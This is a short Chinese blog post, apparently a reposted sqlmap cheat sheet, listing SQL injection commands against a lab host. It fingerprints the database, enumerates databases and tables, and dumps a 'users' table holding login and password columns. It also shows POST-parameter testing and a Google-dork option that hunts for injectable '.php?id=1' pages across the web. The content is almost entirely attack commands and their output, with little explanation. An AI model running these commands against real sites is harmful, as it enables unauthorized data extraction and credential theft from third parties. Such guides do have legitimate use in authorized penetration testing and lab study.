标签:
详细的请见:
http://drops.wooyun.org/tips/143
http://wenku.baidu.com/link?url=45xj6EVVWQjV8upwrBAMIqPP3xMcmi6Zh2pGe27sZ6TZbsBtPJ3QjuIIz672egOe96UCt6T3LuPmczJIUGECmcEQLDRQ3DhYE4qGUmRhDLK
1. 检测特定url一个参数的get:
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -v 3 -f --banner
–flush-session #刷新当前目标的会话文件 –fresh-queries #忽略在会话文件中存储的查询结果
-v 3 #显示检测过程中的payload
列出所有的库和表:
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" --dump-all -v 0
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner --users
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner --dbs
available databases [2]: [*] information_schema [*] photoblog
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner -D "photob
log" --tables
Database: photoblog [3 tables] +------------+ | categories | | pictures | | users | +------------+
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner -D "photob
log" -T "users" --columns
Database: photoblog Table: users [3 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | id | mediumint(9) | | login | varchar(50) | | password | varchar(50) | +----------+--------------+
python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" --dump -D "photoblog"
-T "users" --columns
2. 检测特定url一个参数的post:
python sqlmap.py -u "http://192.168.118.138/cat.php" --data="id=1" -v 3 -f --banner
当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。 例子: python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users
3. 检测google搜索出的结果
python sqlmap.py -g "inurl:\".php?id=1\""
标签:
原文地址:http://www.cnblogs.com/maseng/p/4244624.html